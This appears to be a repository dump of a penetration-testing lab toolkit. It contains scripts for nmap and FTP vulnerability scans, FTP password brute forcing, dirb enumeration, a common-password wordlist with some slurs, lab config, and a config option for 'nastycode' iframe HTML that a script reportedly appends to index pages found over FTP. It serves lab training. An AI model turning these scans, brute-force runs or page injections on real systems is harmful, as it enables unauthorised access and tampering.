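# .xml / .gnmap; kept unchanged because other scripts may look for that name.
FTPSCAN = ["nmap", "-sV", "-Pn", "-vv", "-p", port,
           "--script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221",
           "-oA", "%s/%s_ftp.nmap" % (reconf.exampth, ip_address), ip_address]
subprocess.check_output(FTPSCAN)

print("INFO: Performing password disovery on FTP against " + ip_address)
# brutepwd.py declares -s (service) as required, so the original "-ip X -a" invocation
# exited with an argparse error before any brute force ran.
BRUTE = ["./brutepwd.py", "-ip", ip_address, "-s", "ftp", "-a"]
subprocess.call(BRUTE)
# -------------------------------------------------------------------------------
# /gogolab.sh:
# -------------------------------------------------------------------------------
#!/bin/bash

ulimit -n 1024000
ulimit -Hn 1024000
ulimit -Sn 1024000

function postVPN {
    gnome-terminal -e htop
    gnome-terminal -e iftop
    gnome-terminal --working-directory=/data/lab/results
    gnome-terminal --working-directory=/data/lab/scripts/oscp

    if [ $(ps ax | grep vmware-vmx | grep -v grep | wc -l) -lt 1 ]; then
        vmrun -T player start "${PWD}/vm/Offsec PWK VM.vmx"
    fi
    if [ $(ps ax | grep iceweasel | grep -v grep | wc -l) -lt 1 ]; then
        # NOTE(review): the md=/pid= query parameters look like a personal lab-panel
        # token; keep such values out of the repository (e.g. read them from recon.conf).
        iceweasel 'https://10.70.70.70/oscpanel/labcpanel.php?md=b65c572dd9b210b3dff52be9b4c7997b&pid=189465&servers=1'&
    fi
}

function chkVPN {
    # Live view of lab traffic on the VPN tap interface, minus ARP/RARP and TCP RSTs.
    tcpdump -i $(ifconfig | grep tap | cut -d":" -f1) not arp and not rarp and not 'tcp[13] & 4!=0'
}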
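# (gogolab.sh continues; chkVPN's tcpdump line and closing brace are on the listing line above)

if [ $(type vmrun 2>/dev/null | wc -l) -lt 1 ]; then
    echo -e '\e[01;33m[i]\e[00m vmrun is not available'
    echo -e 'Go to https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0|PLAYER-1200|drivers_tools'
    echo -e 'to download the API'
    iceweasel 'https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0|PLAYER-1200|drivers_tools'
    exit
fi

if [ $(ifconfig | grep tap | cut -d":" -f1 | wc -l) -lt 1 ]; then
    echo -e '\e[01;33m[i]\e[00m Connecting to the lab...'
    cd /data/lab || exit 1    # the original carried on in the wrong directory when cd failed
    ./openlab
    postVPN
    chkVPN
else
    # The original re-tested the same condition (-ge 1) inside this branch; it is the
    # complement of the test above, so the plain else is equivalent.
    echo -e '\e[01;33m[i]\e[00m Already connected to the lab...'
    postVPN
    ./t.sh    # NOTE(review): no t.sh in the tree (only t.py / t1.py) -- confirm the intended script
fi
# -------------------------------------------------------------------------------
# /nmapxml.py:
# -------------------------------------------------------------------------------
#!/usr/bin/env python
import subprocess    # needed by headersEnum(); the original called subprocess without importing it
import reconf
from reconf import *
from xml.dom import minidom


def iter_hosts(info):
    """Yield every <host> element of a parsed nmap XML document."""
    for host_node in info.getElementsByTagName("host"):
        yield host_node


def get_IP_Address(info):
    """Return the first IPv4 <address addr=...> in the document, or '' if there is none."""
    for address in info.getElementsByTagName("address"):
        if address.getAttribute("addrtype") == "ipv4":
            return address.getAttribute("addr")
    return str()


def get_All_IP(info):
    """Return every IPv4 address in the document as one comma-separated string ('' if none)."""
    ipaddrs = [address.getAttribute("addr").encode('ascii')
               for address in info.getElementsByTagName("address")
               if address.getAttribute("addrtype") == "ipv4"]
    return ','.join(ipaddrs)


def get_FQDN(info):
    """Return the first non-empty <hostname name=...> value, or '' if none."""
    for hostname in info.getElementsByTagName("hostname"):
        if hostname.getAttribute("name"):
            return hostname.getAttribute("name")
    return str()


def get_OS(info):
    """Return the <osmatch> name with the highest accuracy, or '' when no OS match is present.

    Matches with equal accuracy overwrite each other in the dict, so the last one listed
    wins (unchanged from the original).
    """
    os_hash = dict()
    for os_detail in info.getElementsByTagName("osmatch"):
        guessed_os = os_detail.getAttribute("name")
        accuracy = os_detail.getAttribute("accuracy")
        if guessed_os and accuracy:
            os_hash[float(accuracy)] = guessed_os
    if not os_hash:
        return str()
    return os_hash[max(os_hash)]


def headersEnum(ip_address, port):
    """Run nmap's http-headers script on ip_address:port, writing <exampth>/<ip>_<port>_httpheader.*.

    The original printed an undefined `url` and never imported subprocess, so it raised
    NameError before doing anything.  nmap is run without a shell.
    """
    url = "%s:%s" % (ip_address, port)
    print("\033[0;33m[>]\033[0;m Identifying Server type on %s" % (url))
    HEADSCAN = ["nmap", "-sV", "-vv", "-Pn", "-n", "-p", str(port), "--script=http-headers",
                "-oA", "%s/%s_%s_httpheader" % (reconf.exampth, ip_address, port), str(ip_address)]
    try:
        subprocess.call(HEADSCAN)
    except OSError as e:    # nmap not installed / not executable
        print("nmap could not be run: %s" % e)


def _port_details(port_details):
    """(protocol, portid, service, product, version) for one <port> element, or None if it is not open.

    Missing <service> attributes come back as ''; the original left the names unbound
    (or carried over the previous port's values) when <service> was absent.
    """
    states = port_details.getElementsByTagName("state")
    if not any(s.getAttribute("state") == "open" for s in states):
        return None
    service = product = version = str()
    for service_details in port_details.getElementsByTagName("service"):
        service = service_details.getAttribute("name")
        product = service_details.getAttribute("product")
        version = service_details.getAttribute("version")
    return (port_details.getAttribute("protocol"), port_details.getAttribute("portid"),
            service, product, version)


def generic_Info(info):
    """Details of the first open <port> (see _port_details), or None when no port is open."""
    for port_details in info.getElementsByTagName("port"):
        details = _port_details(port_details)
        if details is not None:
            return details
    return None


def getiter_Port_Information(info):
    """Yield (port_number, protocol, service, product, version) for every open port."""
    for port_details in info.getElementsByTagName("port"):
        details = _port_details(port_details)
        if details is not None:
            protocol, port_number, service, product, version = details
            yield (port_number, protocol, service, product, version)


def xml2csv(info):
    """Write <rsltpth>/<ip>.csv, one row per open port, with the header shown below.

    Fields are not CSV-escaped: service/product/version come from the target's banners,
    so a quote or comma in a banner breaks the row -- the csv module would fix this but
    changes the quoting of every row, so the original format is kept here.
    """
    csv_header = "IP Address,FQDN,OS,Port,Protocol,Service,Name,Version\n"
    csv_format = '{0},"{1}","{2}",{3},{4},"{5}","{6}","{7}"\n'

    ip = get_IP_Address(info)
    fqdn = get_FQDN(info)
    os = get_OS(info)

    rows = [csv_format.format(ip, fqdn, os, port, protocol, service, product, version)
            for port, protocol, service, product, version in getiter_Port_Information(info)]

    csv_outfile = "%s/%s.csv" % (reconf.rsltpth, ip)
    with open(csv_outfile, "w") as csv_output:
        csv_output.write(csv_header + "".join(rows))
# -------------------------------------------------------------------------------
# /nmapxml.pyc:
# -------------------------------------------------------------------------------
# https://raw.githubusercontent.com/crsftw/oscp/3c6009f013016b63dcf9bffe020a8844455355c8/nmapxml.pyc
# -------------------------------------------------------------------------------
# /oportscan.py:
# -------------------------------------------------------------------------------
#!/usr/bin/env python
import subprocess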
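# (oportscan.py imports continue from the previous listing line)
import multiprocessing
from multiprocessing import *
import os
import sys
import time
import nmap
import re
import reconf
from reconf import *
import time
from functools import wraps

if len(sys.argv) != 2:
    # The original's usage line named deeprecon.py and lost its placeholder in this listing.
    print("Usage: oportscan.py <ip_address>")
    sys.exit(0)

ip_address = sys.argv[1].strip()
folders = [reconf.wordlst, reconf.vulns]    # every file in both directories is used as a dirb wordlist


def hms(seconds):
    """Format a duration in seconds as H:MM:SS (the original appended a stray trailing colon)."""
    minutes, secs = divmod(seconds, 60)
    hours, minutes = divmod(minutes, 60)
    return "%d:%02d:%02d" % (hours, minutes, secs)


def fn_timer(function):
    """Decorator: print the wall-clock time the wrapped call took, then return its result."""
    @wraps(function)
    def function_timer(*args, **kwargs):
        t0 = time.time()
        result = function(*args, **kwargs)
        t1 = time.time()
        # __name__ exists on both Python 2 and 3 (func_name, used originally, is 2-only).
        print("Total time running %s: %s" % (function.__name__, hms(t1 - t0)))
        return result
    return function_timer


def multProc(targetin, scanip, port):
    """Start targetin(scanip, port) in a background process; fire-and-forget, never joined."""
    worker = multiprocessing.Process(target=targetin, args=(scanip, port))
    worker.start()


@fn_timer
def dirbEnum(prot, ip_address, port):
    """Run dirb against prot://ip_address:port once per file in `folders`.

    dirb writes its own report to <exampth>/<ip>_<port>_dirb_<wordlist> (-o); -S silences
    the per-word output and -r disables recursion.  The Trident user agent below was defined
    but never passed by the original; it is sent with -a here, as dirbust.py does.  dirb is
    run without a shell so the argv-supplied IP cannot reach a command line.
    """
    url = "%s://%s:%s" % (prot, ip_address, port)
    print("INFO: Starting dirb scan for " + url)
    agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)"
    for folder in folders:
        for filename in os.listdir(folder):
            wordlist = os.path.join(folder, filename)
            if not os.path.isfile(wordlist):
                continue
            outfile = "%s/%s_%s_dirb_%s" % (reconf.exampth, ip_address, port, filename)
            DIRBSCAN = ["dirb", url, wordlist, "-a", agent, "-o", outfile, "-S", "-r"]
            try:
                subprocess.check_output(DIRBSCAN)
            except (subprocess.CalledProcessError, OSError) as e:
                # dirb missing or exited non-zero: say so (the original swallowed it) and go on.
                print("INFO: dirb failed for %s: %s" % (wordlist, e))


def vpnstatus():
    """Line count of `ifconfig tap0`; more than one line means the lab VPN interface exists."""
    return int(os.popen('ifconfig tap0 | wc -l').read().split()[0])


if __name__ == '__main__':
    # Check if VPN to the Offsec lab is up
    if not vpnstatus() > 1:
        print("You forgot to connect to the lab")
        sys.exit()

    print("[*] Parsing %s/%s.nmap" % (reconf.exampth, ip_address))

    fnmap = "%s/%s.nmap" % (reconf.exampth, ip_address)
    print("\033[1;31m [!] \033[0;m Parsing %s for identifying open ports" % (fnmap))
    with open(fnmap, 'r') as searchfile:
        for line in searchfile:
            if 'open' in line and re.search('http|ssl/http|https', line):
                fields = re.split(r'\s+', line)
                port = fields[0].split('/')[0].strip()      # "80/tcp" -> "80"
                prot = fields[2].split('?')[0].strip()      # "http?"  -> "http"
                if 'ssl/http' in line:
                    prot = 'https'

                dirbEnum(prot, ip_address, port)
# -------------------------------------------------------------------------------
# /passwords.txt:
# -------------------------------------------------------------------------------



123456
password
pa55Word
passw0rd!
pa55W0rd!
12345678
qwerty
123456789
12345
1234
111111
1234567
dragon
123123
baseball
abc123
football
monkey
letmein
l3tm31n
letME1n123
696969
shadow
master
666666
qwertyuiop
123321
mustang
1234567890
michael
654321
pussy
superman
1qaz2wsx
7777777
fuckyou
121212
000000
qazwsx
123qwe
killer
trustno1
jordan
jennifer
zxcvbnm
asdfgh
hunter
buster
soccer
harley
batman
andrew
tigger
sunshine
iloveyou
fuckme
2000
charlie
robert
thomas
hockey
ranger
daniel
starwars
klaster
112233
george
asshole
computer
michelle
jessica
pepper
1111
zxcvbn
555555
11111111
131313
freedom
777777
pass
fuck
maggie
159753
aaaaaa
ginger
princess
joshua
cheese
amanda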
summer 94 | love 95 | ashley 96 | 6969 97 | nicole 98 | chelsea 99 | biteme 100 | matthew 101 | access 102 | yankees 103 | 987654321 104 | dallas 105 | austin 106 | thunder 107 | taylor 108 | matrix 109 | william 110 | corvette 111 | hello 112 | martin 113 | heather 114 | secret 115 | fucker 116 | merlin 117 | diamond 118 | 1234qwer 119 | gfhjkm 120 | hammer 121 | silver 122 | 222222 123 | 88888888 124 | anthony 125 | justin 126 | test 127 | bailey 128 | q1w2e3r4t5 129 | patrick 130 | internet 131 | scooter 132 | orange 133 | 11111 134 | golfer 135 | cookie 136 | richard 137 | samantha 138 | bigdog 139 | guitar 140 | jackson 141 | whatever 142 | mickey 143 | chicken 144 | sparky 145 | snoopy 146 | maverick 147 | phoenix 148 | camaro 149 | sexy 150 | peanut 151 | morgan 152 | welcome 153 | falcon 154 | cowboy 155 | ferrari 156 | samsung 157 | andrea 158 | smokey 159 | steelers 160 | joseph 161 | mercedes 162 | dakota 163 | arsenal 164 | eagles 165 | melissa 166 | boomer 167 | booboo 168 | spider 169 | nascar 170 | monster 171 | tigers 172 | yellow 173 | xxxxxx 174 | 123123123 175 | gateway 176 | marina 177 | diablo 178 | bulldog 179 | qwer1234 180 | compaq 181 | purple 182 | hardcore 183 | banana 184 | junior 185 | hannah 186 | 123654 187 | porsche 188 | lakers 189 | iceman 190 | money 191 | cowboys 192 | 987654 193 | london 194 | tennis 195 | 999999 196 | ncc1701 197 | coffee 198 | scooby 199 | 0000 200 | miller 201 | boston 202 | q1w2e3r4 203 | fuckoff 204 | brandon 205 | yamaha 206 | chester 207 | mother 208 | forever 209 | johnny 210 | edward 211 | 333333 212 | oliver 213 | redsox 214 | player 215 | nikita 216 | knight 217 | fender 218 | barney 219 | midnight 220 | please 221 | brandy 222 | chicago 223 | badboy 224 | iwantu 225 | slayer 226 | rangers 227 | charles 228 | angel 229 | flower 230 | bigdaddy 231 | rabbit 232 | wizard 233 | bigdick 234 | jasper 235 | enter 236 | rachel 237 | chris 238 | steven 239 | winner 240 | adidas 241 | victoria 242 | natasha 243 
| 1q2w3e4r 244 | jasmine 245 | winter 246 | prince 247 | panties 248 | marine 249 | ghbdtn 250 | fishing 251 | cocacola 252 | casper 253 | james 254 | 232323 255 | raiders 256 | 888888 257 | marlboro 258 | gandalf 259 | asdfasdf 260 | crystal 261 | 87654321 262 | 12344321 263 | sexsex 264 | golden 265 | blowme 266 | bigtits 267 | 8675309 268 | panther 269 | lauren 270 | angela 271 | bitch 272 | spanky 273 | thx1138 274 | angels 275 | madison 276 | winston 277 | shannon 278 | mike 279 | toyota 280 | blowjob 281 | jordan23 282 | canada 283 | sophie 284 | Password 285 | apples 286 | dick 287 | tiger 288 | razz 289 | 123abc 290 | pokemon 291 | qazxsw 292 | 55555 293 | qwaszx 294 | muffin 295 | johnson 296 | murphy 297 | cooper 298 | jonathan 299 | liverpoo 300 | david 301 | danielle 302 | 159357 303 | jackie 304 | 1990 305 | 123456a 306 | 789456 307 | turtle 308 | horny 309 | abcd1234 310 | scorpion 311 | qazwsxedc 312 | 101010 313 | butter 314 | carlos 315 | password1 316 | dennis 317 | slipknot 318 | qwerty123 319 | booger 320 | asdf 321 | 1991 322 | black 323 | startrek 324 | 12341234 325 | cameron 326 | newyork 327 | rainbow 328 | nathan 329 | john 330 | 1992 331 | rocket 332 | viking 333 | redskins 334 | butthead 335 | asdfghjkl 336 | 1212 337 | sierra 338 | peaches 339 | gemini 340 | doctor 341 | wilson 342 | sandra 343 | helpme 344 | qwertyui 345 | victor 346 | florida 347 | dolphin 348 | pookie 349 | captain 350 | tucker 351 | blue 352 | liverpool 353 | theman 354 | bandit 355 | dolphins 356 | maddog 357 | packers 358 | jaguar 359 | lovers 360 | nicholas 361 | united 362 | tiffany 363 | maxwell 364 | zzzzzz 365 | nirvana 366 | jeremy 367 | suckit 368 | stupid 369 | porn 370 | monica 371 | elephant 372 | giants 373 | jackass 374 | hotdog 375 | rosebud 376 | success 377 | debbie 378 | mountain 379 | 444444 380 | xxxxxxxx 381 | warrior 382 | 1q2w3e4r5t 383 | q1w2e3 384 | 123456q 385 | albert 386 | metallic 387 | lucky 388 | azerty 389 | 7777 390 | shithead 391 | 
alex 392 | bond007 393 | alexis 394 | 1111111 395 | samson 396 | 5150 397 | willie 398 | scorpio 399 | bonnie 400 | gators 401 | benjamin 402 | voodoo 403 | driver 404 | dexter 405 | 2112 406 | jason 407 | calvin 408 | freddy 409 | 212121 410 | creative 411 | 12345a 412 | sydney 413 | rush2112 414 | 1989 415 | asdfghjk 416 | red123 417 | bubba 418 | 4815162342 419 | passw0rd 420 | trouble 421 | gunner 422 | happy 423 | fucking 424 | gordon 425 | legend 426 | jessie 427 | stella 428 | qwert 429 | eminem 430 | arthur 431 | apple 432 | nissan 433 | bullshit 434 | bear 435 | america 436 | 1qazxsw2 437 | nothing 438 | parker 439 | 4444 440 | rebecca 441 | qweqwe 442 | garfield 443 | 01012011 444 | beavis 445 | 69696969 446 | jack 447 | asdasd 448 | december 449 | 2222 450 | 102030 451 | 252525 452 | 11223344 453 | magic 454 | apollo 455 | skippy 456 | 315475 457 | girls 458 | kitten 459 | golf 460 | copper 461 | braves 462 | shelby 463 | godzilla 464 | beaver 465 | fred 466 | tomcat 467 | august 468 | buddy 469 | airborne 470 | 1993 471 | 1988 472 | lifehack 473 | qqqqqq 474 | brooklyn 475 | animal 476 | platinum 477 | phantom 478 | online 479 | xavier 480 | darkness 481 | blink182 482 | power 483 | fish 484 | green 485 | 789456123 486 | voyager 487 | police 488 | travis 489 | 12qwaszx 490 | heaven 491 | snowball 492 | lover 493 | abcdef 494 | 00000 495 | pakistan 496 | 007007 497 | walter 498 | playboy 499 | blazer 500 | cricket 501 | sniper 502 | hooters 503 | donkey 504 | willow 505 | loveme 506 | saturn 507 | therock 508 | redwings 509 | bigboy 510 | pumpkin 511 | trinity 512 | williams 513 | tits 514 | nintendo 515 | digital 516 | destiny 517 | topgun 518 | runner 519 | marvin 520 | guinness 521 | chance 522 | bubbles 523 | testing 524 | fire 525 | november 526 | minecraft 527 | asdf1234 528 | lasvegas 529 | sergey 530 | broncos 531 | cartman 532 | private 533 | celtic 534 | birdie 535 | little 536 | cassie 537 | babygirl 538 | donald 539 | beatles 540 | 1313 541 | 
dickhead 542 | family 543 | 12121212 544 | school 545 | louise 546 | gabriel 547 | eclipse 548 | fluffy 549 | 147258369 550 | lol123 551 | explorer 552 | beer 553 | nelson 554 | flyers 555 | spencer 556 | scott 557 | lovely 558 | gibson 559 | doggie 560 | cherry 561 | andrey 562 | snickers 563 | buffalo 564 | pantera 565 | metallica 566 | member 567 | carter 568 | qwertyu 569 | peter 570 | alexande 571 | steve 572 | bronco 573 | paradise 574 | goober 575 | 5555 576 | samuel 577 | montana 578 | mexico 579 | dreams 580 | michigan 581 | cock 582 | carolina 583 | yankee 584 | friends 585 | magnum 586 | surfer 587 | poopoo 588 | maximus 589 | genius 590 | cool 591 | vampire 592 | lacrosse 593 | asd123 594 | aaaa 595 | christin 596 | kimberly 597 | speedy 598 | sharon 599 | carmen 600 | 111222 601 | kristina 602 | sammy 603 | racing 604 | ou812 605 | sabrina 606 | horses 607 | 0987654321 608 | qwerty1 609 | pimpin 610 | baby 611 | stalker 612 | enigma 613 | 147147 614 | star 615 | poohbear 616 | boobies 617 | 147258 618 | simple 619 | bollocks 620 | 12345q 621 | marcus 622 | brian 623 | 1987 624 | qweasdzxc 625 | drowssap 626 | hahaha 627 | caroline 628 | barbara 629 | dave 630 | viper 631 | drummer 632 | action 633 | einstein 634 | bitches 635 | genesis 636 | hello1 637 | scotty 638 | friend 639 | forest 640 | 010203 641 | hotrod 642 | google 643 | vanessa 644 | spitfire 645 | badger 646 | maryjane 647 | friday 648 | alaska 649 | 1232323q 650 | tester 651 | jester 652 | jake 653 | champion 654 | billy 655 | 147852 656 | rock 657 | hawaii 658 | badass 659 | chevy 660 | 420420 661 | walker 662 | stephen 663 | eagle1 664 | bill 665 | 1986 666 | october 667 | gregory 668 | svetlana 669 | pamela 670 | 1984 671 | music 672 | shorty 673 | westside 674 | stanley 675 | diesel 676 | courtney 677 | 242424 678 | kevin 679 | porno 680 | hitman 681 | boobs 682 | mark 683 | 12345qwert 684 | reddog 685 | frank 686 | qwe123 687 | popcorn 688 | patricia 689 | aaaaaaaa 690 | 1969 691 | 
teresa 692 | mozart 693 | buddha 694 | anderson 695 | paul 696 | melanie 697 | abcdefg 698 | security 699 | lucky1 700 | lizard 701 | denise 702 | 3333 703 | a12345 704 | 123789 705 | ruslan 706 | stargate 707 | simpsons 708 | scarface 709 | eagle 710 | 123456789a 711 | thumper 712 | olivia 713 | naruto 714 | 1234554321 715 | general 716 | cherokee 717 | a123456 718 | vincent 719 | Usuckballz1 720 | spooky 721 | qweasd 722 | cumshot 723 | free 724 | frankie 725 | douglas 726 | death 727 | 1980 728 | loveyou 729 | kitty 730 | kelly 731 | veronica 732 | suzuki 733 | semperfi 734 | penguin 735 | mercury 736 | liberty 737 | spirit 738 | scotland 739 | natalie 740 | marley 741 | vikings 742 | system 743 | sucker 744 | king 745 | allison 746 | marshall 747 | 1979 748 | 098765 749 | qwerty12 750 | hummer 751 | adrian 752 | 1985 753 | vfhbyf 754 | sandman 755 | rocky 756 | leslie 757 | antonio 758 | 98765432 759 | 4321 760 | softball 761 | passion 762 | mnbvcxz 763 | bastard 764 | passport 765 | horney 766 | rascal 767 | howard 768 | franklin 769 | bigred 770 | assman 771 | alexander 772 | homer 773 | redrum 774 | jupiter 775 | claudia 776 | 55555555 777 | 141414 778 | zaq12wsx 779 | shit 780 | patches 781 | nigger 782 | cunt 783 | raider 784 | infinity 785 | andre 786 | 54321 787 | galore 788 | college 789 | russia 790 | kawasaki 791 | bishop 792 | 77777777 793 | vladimir 794 | money1 795 | freeuser 796 | wildcats 797 | francis 798 | disney 799 | budlight 800 | brittany 801 | 1994 802 | 00000000 803 | sweet 804 | oksana 805 | honda 806 | domino 807 | bulldogs 808 | brutus 809 | swordfis 810 | norman 811 | monday 812 | jimmy 813 | ironman 814 | ford 815 | fantasy 816 | 9999 817 | 7654321 818 | PASSWORD 819 | hentai 820 | duncan 821 | cougar 822 | 1977 823 | jeffrey 824 | house 825 | dancer 826 | brooke 827 | timothy 828 | super 829 | marines 830 | justice 831 | digger 832 | connor 833 | patriots 834 | karina 835 | 202020 836 | molly 837 | everton 838 | tinker 839 | alicia 
840 | rasdzv3 841 | poop 842 | pearljam 843 | stinky 844 | naughty 845 | colorado 846 | 123123a 847 | water 848 | test123 849 | ncc1701d 850 | motorola 851 | ireland 852 | asdfg 853 | slut 854 | matt 855 | houston 856 | boogie 857 | zombie 858 | accord 859 | vision 860 | bradley 861 | reggie 862 | kermit 863 | froggy 864 | ducati 865 | avalon 866 | 6666 867 | 9379992 868 | sarah 869 | saints 870 | logitech 871 | chopper 872 | 852456 873 | simpson 874 | madonna 875 | juventus 876 | claire 877 | 159951 878 | zachary 879 | yfnfif 880 | wolverin 881 | warcraft 882 | hello123 883 | extreme 884 | penis 885 | peekaboo 886 | fireman 887 | eugene 888 | brenda 889 | 123654789 890 | russell 891 | panthers 892 | georgia 893 | smith 894 | skyline 895 | jesus 896 | elizabet 897 | spiderma 898 | smooth 899 | pirate 900 | empire 901 | bullet 902 | 8888 903 | virginia 904 | valentin 905 | psycho 906 | predator 907 | arizona 908 | 134679 909 | mitchell 910 | alyssa 911 | vegeta 912 | titanic 913 | christ 914 | goblue 915 | fylhtq 916 | wolf 917 | mmmmmm 918 | kirill 919 | indian 920 | hiphop 921 | baxter 922 | awesome 923 | people 924 | danger 925 | roland 926 | mookie 927 | 741852963 928 | 1111111111 929 | dreamer 930 | bambam 931 | arnold 932 | 1981 933 | skipper 934 | serega 935 | rolltide 936 | elvis 937 | changeme 938 | simon 939 | 1q2w3e 940 | lovelove 941 | fktrcfylh 942 | denver 943 | tommy 944 | mine 945 | loverboy 946 | hobbes 947 | happy1 948 | alison 949 | nemesis 950 | chevelle 951 | cardinal 952 | burton 953 | wanker 954 | picard 955 | 151515 956 | tweety 957 | michael1 958 | 147852369 959 | 12312 960 | xxxx 961 | windows 962 | turkey 963 | 456789 964 | 1974 965 | vfrcbv 966 | sublime 967 | 1975 968 | galina 969 | bobby 970 | newport 971 | manutd 972 | daddy 973 | american 974 | alexandr 975 | 1966 976 | victory 977 | rooster 978 | qqq111 979 | madmax 980 | electric 981 | bigcock 982 | a1b2c3 983 | wolfpack 984 | spring 985 | phpbb 986 | lalala 987 | suckme 988 | 
spiderman 989 | eric 990 | darkside 991 | classic 992 | raptor 993 | 123456789q 994 | hendrix 995 | 1982 996 | wombat 997 | avatar 998 | alpha 999 | zxc123 1000 | crazy 1001 | hard 1002 | england 1003 | brazil 1004 | 1978 1005 | 01011980 1006 | wildcat 1007 | polina 1008 | freepass 1009 | aliceisnice 1010 | -------------------------------------------------------------------------------- /recon.conf: -------------------------------------------------------------------------------- 1 | [hosts] 2 | iprange: 192.168.31.200-205 3 | fulliprng: 192.168.31.200-254 4 | opth: /data/lab/results/exam/ipList.gnmap 5 | olst: /data/lab/results/exam/ipList.txt 6 | 7 | [base] 8 | rootpth: /data 9 | labpath: /data/lab 10 | 11 | [paths] 12 | basepth: /data/lab 13 | rsltpth: /data/lab/results 14 | exampth: /data/lab/results/exam 15 | nmappth: /data/lab/results/exam/nmap 16 | 17 | [nmapscripts] 18 | httpnse: http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-screenshot-html 19 | nsepth: /usr/share/nmap/scripts 20 | 21 | [wordlist] 22 | wordlst: /usr/share/dirb/wordlists 23 | shortlst: indexes.txt,small.txt 24 | moderlst: indexes.txt,common.txt,small.txt,mutations_common.txt,extensions_common.txt 25 | 26 | [vuln] 27 | vulns: /usr/share/dirb/wordlists/vulns 28 | 29 | [crack] 30 | usrlst: /data/lab/scripts/oscp/users.txt 31 | pwdlst: /data/lab/scripts/oscp/passwords.txt 32 | fzzlst: /data/lab/scripts/oscp/users.txt 33 | 34 | [useragent] 35 | uagnt1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko 36 | uagnt2: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) 37 | uagnt3: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) 38 | uagnt4: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1) 39 | uagnt5: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 40 | [nastycode] 41 | iframe1: 42 | 
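#!/usr/bin/env python
# ---- /reconf.py ----
"""Load recon.conf and publish its options as module-level globals.

Every other script does ``import reconf`` / ``from reconf import *`` and then
reads ``reconf.rsltpth``, ``reconf.usrlst`` and friends, so the option names in
``_SETTINGS`` are this module's interface.  Values are the raw config strings;
nothing here checks that the paths exist (reconscan.py / setup.py create the
result folders).
"""
import os

try:
    import ConfigParser                   # Python 2
except ImportError:
    import configparser as ConfigParser   # Python 3

CONF_FILE = 'recon.conf'   # resolved against the current working directory, as before

# (section, option) pairs; each option becomes a global of the same name.
_SETTINGS = (
    ('hosts', 'iprange'),
    ('hosts', 'fulliprng'),
    ('hosts', 'opth'),
    ('hosts', 'olst'),
    ('base', 'rootpth'),
    ('base', 'labpath'),
    ('paths', 'basepth'),        # was read but never exported; now reachable as reconf.basepth
    ('paths', 'rsltpth'),
    ('paths', 'exampth'),
    ('paths', 'nmappth'),
    ('wordlist', 'wordlst'),
    ('wordlist', 'shortlst'),
    ('wordlist', 'moderlst'),
    ('vuln', 'vulns'),
    ('nmapscripts', 'httpnse'),
    ('nmapscripts', 'nsepth'),
    ('crack', 'usrlst'),
    ('crack', 'pwdlst'),
    ('crack', 'fzzlst'),
    ('useragent', 'uagnt1'),
    ('useragent', 'uagnt2'),
    ('useragent', 'uagnt3'),
    ('useragent', 'uagnt4'),
    ('useragent', 'uagnt5'),
    ('nastycode', 'iframe1'),    # HTML that t1.py appends to index pages it finds over FTP
)


def set_vars():
    """Read CONF_FILE and bind every _SETTINGS option as a module global.

    Raises:
        IOError: CONF_FILE is missing or unreadable.  ``ConfigParser.read()``
            silently skips such files, which used to surface only as a
            confusing NoSectionError on the first ``get()``.
        ConfigParser.Error: a listed section or option is absent.
    """
    config = ConfigParser.ConfigParser()
    if not config.read(CONF_FILE):
        raise IOError("%s not found in %s" % (CONF_FILE, os.getcwd()))
    for section, option in _SETTINGS:
        globals()[option] = config.get(section, option)


set_vars()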
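#!/usr/bin/env python
# ---- /reconscan.py ----
"""Sweep the lab range, list the live hosts, then nmap each of them.

Flow (see ``__main__``): require the lab VPN interface (tap0) to be up, make
sure the folders from recon.conf exist, ping-sweep ``reconf.iprange`` into
``reconf.olst`` and fork one ``dualScan`` process per live address.

All external commands are passed as argument lists rather than shell strings,
so an address read from the nmap output can never be shell-interpreted.
"""
import multiprocessing
from multiprocessing import *
import os
import re
import subprocess
import sys
import time
from functools import wraps

import nmap

import reconf
from reconf import *


def hms(seconds):
    """Format a duration in seconds as ``H:MM:SS:`` (the trailing colon is
    part of the existing log format and is kept on purpose)."""
    minutes, secs = divmod(seconds, 60)
    hours, minutes = divmod(minutes, 60)
    return "%d:%02d:%02d:" % (hours, minutes, secs)


def fn_timer(function):
    """Decorator: print how long ``function`` ran, then return its result."""
    @wraps(function)
    def function_timer(*args, **kwargs):
        started = time.time()
        result = function(*args, **kwargs)
        # __name__ works on both Python 2 and 3; the original func_name is 2-only.
        print("Total time running %s: %s" % (function.__name__, hms(time.time() - started)))
        return result
    return function_timer


def multProc(targetin, scanip, port):
    """Start ``targetin(scanip, port)`` in a child process and return immediately.

    Kept for callers elsewhere; nothing in this file uses it.
    """
    worker = multiprocessing.Process(target=targetin, args=(scanip, port))
    worker.start()


def _nmap(options, ip_address, outbase):
    """Run ``nmap <options> -oA outbase ip_address``; raises CalledProcessError on failure."""
    subprocess.check_output(["nmap"] + options + ["-oA", outbase, ip_address])


def TCPScan(ip_address):
    """Full TCP port scan (-p-) with version/OS detection; output goes to
    ``<reconf.exampth>/<ip>.{nmap,gnmap,xml}``."""
    ip_address = ip_address.strip()
    print("\033[1;33m[*]\033[0;m Running general TCP nmap scans for " + ip_address)
    _nmap(["-sV", "-vv", "-Pn", "-O", "-sS", "-T4", "-p-"], ip_address,
          "%s/%s" % (reconf.exampth, ip_address))


def UDPScan(ip_address):
    """Top-20 UDP port scan with version/OS detection; output goes to
    ``<reconf.exampth>/<ip>U.{nmap,gnmap,xml}``."""
    ip_address = ip_address.strip()
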